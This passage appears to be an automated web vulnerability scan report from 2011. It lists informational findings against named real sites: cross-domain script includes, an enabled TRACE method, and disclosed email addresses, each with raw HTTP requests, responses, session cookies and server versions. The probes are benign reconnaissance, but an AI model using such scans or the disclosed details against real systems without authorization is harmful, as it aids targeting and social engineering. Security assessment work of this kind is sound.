<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MkzdOyLK9pgJ:forum.mailsite.com/printer_friendly_posts.asp%3FTID%3D40+MailSite+Express+version+5.3.11&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:MkzdOyLK9pgJ:forum.mailsite.com/printer_friendly_posts.asp%3FTID%3D40+MailSite+Express+version+5.3.11&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com','','','','4','','0CDwQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.faxsite.com/forum/forum_posts.asp?TID=40&amp;PD=0" class=l onmousedown="return clk(this.href,'','','','5','','0CD4QFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:U7nLBumE5qIJ:www.faxsite.com/forum/forum_posts.asp%3FTID%3D40%26PD%3D0+MailSite+Express+version+5.3.11&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:U7nLBumE5qIJ:www.faxsite.com/forum/forum_posts.asp%3FTID%3D40%26PD%3D0+MailSite+Express+version+5.3.11&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com','','','','5','','0CEUQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://shop.towerhobbies.com/cgi-bin/wti0001p?&amp;P=WR&amp;I=LXBDAC" class=l onmousedown="return clk(this.href,'','','','6','','0CEYQFjAF')">TowerHobbies.com | AA0418 Thunder Tiger Flex Shaft Guide PRO-21M OB</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:CN20zoUszTEJ:shop.towerhobbies.com/cgi-bin/wti0001p%3F%26P%3DWR%26I%3DLXBDAC+MailSite+Express+version+5.3.11&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:CN20zoUszTEJ:shop.towerhobbies.com/cgi-bin/wti0001p%3F%26P%3DWR%26I%3DLXBDAC+MailSite+Express+version+5.3.11&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com','','','','6','','0CE0QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.novell.com/documentation/idm401drivers/pdfdoc/groupwise/groupwise.pdf" class=l onmousedown="return clk(this.href,'','','','7','','0CE4QFjAG')">Identity Manager 4.0.1 Driver for GroupWise Implementation Guide</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ianywhere.com/developer/product_manuals/mbusiness_anywhere/55/en/pdf/developer_guide.pdf" class=l onmousedown="return clk(this.href,'','','','8','','0CFQQFjAH')">Developer Guide</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mcgill.ca/files/courses/GPS0809.pdf" class=l onmousedown="return clk(this.href,'','','','9','','0CFkQFjAI')">Principal&#39;s Message</a>
...[SNIP]...

10. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


10.1. http://rockliffe.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rockliffe.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: rockliffe.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:58:23 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQDRABTC=DOFBGCODDHACNBJDFNFHDMLA; path=/
Vary: Accept-Encoding
Content-Length: 52418

<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/tabs.js"></SCRIPT>
<script>

function showflash(){

//    var browser = BrowserDetect.b
...[SNIP]...
</tr>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

10.2. http://rockliffe.com/portal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rockliffe.com
Path:   /portal/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portal/ HTTP/1.1
Host: rockliffe.com
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=COFBGCODFJKBCOFEBJOEEEJG; __utma=179611303.870644604.1305464308.1305464308.1305464308.1; __utmb=179611303; __utmc=179611303; __utmz=179611303.1305464308.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:59:04 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</tr>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

10.3. http://www.mailsite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=OBGBGCODHNJGPCDNLDDEOMFA

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:59:31 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 52418

<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/tabs.js"></SCRIPT>
<script>

function showflash(){

//    var browser = BrowserDetect.b
...[SNIP]...
<TD ALIGN=RIGHT>
<script language='JavaScript' type='text/javascript' src='http://webchat.rockliffe.com:9090/webchat/common.js' ></script>
...[SNIP]...
</tr>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

11. TRACE method is enabled  previous  next
There are 3 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


11.1. http://hotchilli.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hotchilli.net
Path:   /

Request

TRACE / HTTP/1.0
Host: hotchilli.net
Cookie: 94aa294266d2ae54

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:02:24 GMT
Server: Apache/2.0.61 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: hotchilli.net
Cookie: 94aa294266d2ae54


11.2. http://support.hotchilli.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.hotchilli.net
Path:   /

Request

TRACE / HTTP/1.0
Host: support.hotchilli.net
Cookie: 82c2be0760da5d1b

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:05:00 GMT
Server: Apache/2.0.61 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: support.hotchilli.net
Cookie: 82c2be0760da5d1b


11.3. https://totalcontrol.hotchilli.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://totalcontrol.hotchilli.net
Path:   /

Request

TRACE / HTTP/1.0
Host: totalcontrol.hotchilli.net
Cookie: 60e96a08705c6dc3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:05:16 GMT
Server: Apache/2.0.61 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: totalcontrol.hotchilli.net
Cookie: 60e96a08705c6dc3


12. Email addresses disclosed  previous  next
There are 13 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


12.1. http://hotchilli.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hotchilli.net
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: hotchilli.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:02:24 GMT
Server: Apache/2.0.61 (Unix)
Last-Modified: Fri, 05 Feb 2010 21:55:18 GMT
ETag: "ea505-6248-47ee181d7fd80"
Accept-Ranges: bytes
Content-Length: 25160
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META NAME="keywords" CONTENT="web hosting,nt hosting,unix hosting,cold fusion hosting,linux hosting,domain name registrat
...[SNIP]...
<META NAME="meta author" CONTENT="design@hotchilli.com">
<META HTTP-EQUIV="reply-to" CONTENT="support@hotchilli.com">
...[SNIP]...

12.2. http://hotchilli.net/communications/ngn.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hotchilli.net
Path:   /communications/ngn.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /communications/ngn.htm HTTP/1.1
Host: hotchilli.net
Proxy-Connection: keep-alive
Referer: http://hotchilli.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:03:01 GMT
Server: Apache/2.0.61 (Unix)
Last-Modified: Fri, 12 Jun 2009 14:05:10 GMT
ETag: "398bd-47a7-46c273248d180"
Accept-Ranges: bytes
Content-Length: 18343
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META NAME="keywords" CONTENT="web hosting,nt hosting,unix hosting,cold fusion hosting,linux hosting,domain name registrat
...[SNIP]...
<META NAME="meta author" CONTENT="design@hotchilli.com">
<META HTTP-EQUIV="reply-to" CONTENT="support@hotchilli.com">
...[SNIP]...
<a href="mailto:sales@hotchilli.com">sales@hotchilli.com</a>
...[SNIP]...

12.3. http://hotchilli.net/communications/premium-rate.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hotchilli.net
Path:   /communications/premium-rate.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /communications/premium-rate.htm HTTP/1.1
Host: hotchilli.net
Proxy-Connection: keep-alive
Referer: http://hotchilli.net/communications/ngn.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:04:51 GMT
Server: Apache/2.0.61 (Unix)
Last-Modified: Fri, 12 Jun 2009 14:05:10 GMT
ETag: "c79b0-47b4-46c273248d180"
Accept-Ranges: bytes
Content-Length: 18356
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META NAME="keywords" CONTENT="web hosting,nt hosting,unix hosting,cold fusion hosting,linux hosting,domain name registrat
...[SNIP]...
<META NAME="meta author" CONTENT="design@hotchilli.com">
<META HTTP-EQUIV="reply-to" CONTENT="support@hotchilli.com">
...[SNIP]...
<a href="mailto:sales@hotchilli.com">sales@hotchilli.com</a>
...[SNIP]...

12.4. http://hotchilli.net/support/total-control.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hotchilli.net
Path:   /support/total-control.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /support/total-control.htm HTTP/1.1
Host: hotchilli.net
Proxy-Connection: keep-alive
Referer: http://hotchilli.net/communications/premium-rate.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:04:53 GMT
Server: Apache/2.0.61 (Unix)
Last-Modified: Fri, 05 Feb 2010 21:57:35 GMT
ETag: "39b34-5339-47ee18a0271c0"
Accept-Ranges: bytes
Content-Length: 21305
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META NAME="keywords" CONTENT="web hosting,nt hosting,unix hosting,cold fusion hosting,linux hosting,domain name registrat
...[SNIP]...
<META NAME="meta author" CONTENT="design@hotchilli.com">
<META HTTP-EQUIV="reply-to" CONTENT="support@hotchilli.com">
...[SNIP]...
<a href="mailto:sales@hotchilli.com">sales@hotchilli.com</a>
...[SNIP]...
<a href="mailto:support@hotchilli.com?subject=%22Request%20for%20Total%20Control%20Login%20Details%22">support@hotchilli.com</a>
...[SNIP]...

12.5. http://rockliffe.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rockliffe.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: rockliffe.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:58:23 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQDRABTC=DOFBGCODDHACNBJDFNFHDMLA; path=/
Vary: Accept-Encoding
Content-Length: 52418

<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/tabs.js"></SCRIPT>
<script>

function showflash(){

//    var browser = BrowserDetect.b
...[SNIP]...
<script>showChatButton('mailsite@workgroup.rockliffe.com');</script>
...[SNIP]...

12.6. http://rockliffe.com/nav_functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rockliffe.com
Path:   /nav_functions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /nav_functions.js HTTP/1.1
Host: rockliffe.com
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=COFBGCODFJKBCOFEBJOEEEJG

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Mar 2010 20:08:08 GMT
Accept-Ranges: bytes
ETag: "044a08fdc6ca1:4eef"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 12:58:26 GMT
Content-Length: 33359

/***********************************************************************************
*    (c) Ger Versluis 2000 version 5.411 24 December 2001 (updated Jan 31st, 2003 by Dynamic Drive for Opera7)
*    For info write to menus@burmees.nl         *
*    You may remove all comments for faster loading     *        
***********************************************************************************/

   var NoOffFirstLineMenus=9;            // N
...[SNIP]...
, 2003 by Dynamic Drive for Opera7)
   Updated 19 July, 2003 by GV for CSS CompatMode    
   HV Menu found on Dynamic Drive ONLY may be used on both commercial and non commerical sites    
   For info write to menus@burmees.nl                            
   This script featured on Dynamic Drive DHTML code library: http://www.dynamicdrive.com
*************************************************************************************/
   var Agn
...[SNIP]...

12.7. http://rockliffe.com/portal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rockliffe.com
Path:   /portal/

Issue detail

The following email address was disclosed in the response:

Request

GET /portal/ HTTP/1.1
Host: rockliffe.com
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=COFBGCODFJKBCOFEBJOEEEJG; __utma=179611303.870644604.1305464308.1305464308.1305464308.1; __utmb=179611303; __utmc=179611303; __utmz=179611303.1305464308.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:59:04 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
<script>showChatButton('mailsite@workgroup.rockliffe.com');</script>
...[SNIP]...

12.8. http://support.hotchilli.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.hotchilli.net
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: support.hotchilli.net
Proxy-Connection: keep-alive
Referer: http://hotchilli.net/support/total-control.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:04:59 GMT
Server: Apache/2.0.61 (Unix)
Set-Cookie: CFID=3833869;expires=Tue, 07-May-2041 12:04:59 GMT;path=/
Set-Cookie: CFTOKEN=71080920;expires=Tue, 07-May-2041 12:04:59 GMT;path=/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 6419

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...
<A HREF="mailto:sales@hotchilli.com" CLASS="terms">sales@hotchilli.com</A>
...[SNIP]...

12.9. https://totalcontrol.hotchilli.net/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://totalcontrol.hotchilli.net
Path:   /index.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

POST /index.cfm HTTP/1.1
Host: totalcontrol.hotchilli.net
Connection: keep-alive
Referer: http://support.hotchilli.net/
Cache-Control: max-age=0
Origin: http://support.hotchilli.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 56

Submit=Forgot+Your+Password%3F&j_username=1&j_password=1

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:05:16 GMT
Server: Apache/2.0.61 (Unix)
Set-Cookie: CFID=3833928;expires=Tue, 07-May-2041 12:05:16 GMT;path=/
Set-Cookie: CFTOKEN=12505786;expires=Tue, 07-May-2041 12:05:16 GMT;path=/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 8438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/script
...[SNIP]...
<br>
                                           Your account reference can be found
                                           on the top of all your invoices, if
                                           you do not know your account reference
                                           please email support@hotchilli.com
                                           with the subject line &quot;Total
                                           Control Password&quot; and they will
                                           email you your login details.</TD>
...[SNIP]...
<A HREF="mailto:sales@hotchilli.com" CLASS="terms">sales@hotchilli.com</A>
...[SNIP]...

12.10. http://www.google.com/s  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /s

Issue detail

The following email address was disclosed in the response:

Request

GET /s?hl=en&sugexp=ldymls&pq=coldfusion.required&xhr=t&q=ColdFusion.required%22&cp=20&pf=p&sclient=psy&tbo=1&tbs=qdr:w&source=hp&aq=&aqi=&aql=&oq=&pbx=1&bav=on.2,or.r_gc.r_pw.&fp=39e5bf4e97622fe9&tch=1&ech=2&psi=tszPTYGDEui40QHW25TpDQ.1305463991261.13 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ColdFusion.required
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=a2WEVV1pGyLhyzX0eoyN4112Szbl5bsuUuXxvplDzxL5iTKqoNP1PX_CW9GigJ-rF89o0HmEaBAsnNxGYLXTFSFUaLSafQW5LDzXiCTk9VqmvR_H7O1dB7XZ5-UALZuy

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:53:56 GMT
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: application/json; charset=UTF-8
Pragma: no-cache
Content-Disposition: attachment
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 71301

{e:"5MzPTZbSEoHB0AGfgdGBDg",c:1,u:"http://www.google.com/s?hl\x3den\x26sugexp\x3dldymls\x26pq\x3dcoldfusion.required\x26xhr\x3dt\x26q\x3dColdFusion.required%22\x26cp\x3d20\x26pf\x3dp\x26sclient\x3dpsy
...[SNIP]...
c!--n--\\x3e\\x3c!--m--\\x3e\\x3cli class\\x3dg\\x3e\\x3cdiv class\\x3dvsc sig\\x3dIb8\\x3e\\x3cspan class\\x3dtl\\x3e\\x3ch3 class\\x3d\\x22r\\x22\\x3e\\x3ca href\\x3d\\x22http://www.mail-archive.com/abapclub@googlegroups.com/msg10487.html\\x22 class\\x3dl onmousedown\\x3d\\x22return rwt(this,\\x27\\x27,\\x27\\x27,\\x27\\x27,\\x2710\\x27,\\x27AFQjCNEAvQRIiqG4SOBRR4nk4B3y5uMVNA\\x27,\\x27\\x27,\\x270CGQQFjAJ\\x27)\\x22\\x3e
...[SNIP]...

12.11. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search?q=ColdFusion.required&hl=en&tbo=1&tbs=qdr:w&prmd=ivns&source=lnt&sa=X&ei=3szPTbLpKKjr0QHE2-z1DQ&ved=0CAwQpwUoAw&bav=on.2,or.r_gc.r_pw.&fp=a3ef8fbf565e66c1&tch=1&ech=1&psi=tszPTYGDEui40QHW25TpDQ.1305463991261.13 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ColdFusion.required
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: vD843DpA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=a2WEVV1pGyLhyzX0eoyN4112Szbl5bsuUuXxvplDzxL5iTKqoNP1PX_CW9GigJ-rF89o0HmEaBAsnNxGYLXTFSFUaLSafQW5LDzXiCTk9VqmvR_H7O1dB7XZ5-UALZuy

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:53:52 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: application/json; charset=UTF-8
Content-Disposition: attachment
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 68047

ShjDd-Or....S....L..N..&...A........f{e:"4MzPTaaKJIr30gHCpIWSDA",c:1,u:"http://www.google.com/search?q\x3dColdFusion.required\x26hl\x3den\x26tbo\x3d1\x26tbs\x3dqdr:w\x26prmd\x3divns\x26source\x3dlnt\x
...[SNIP]...
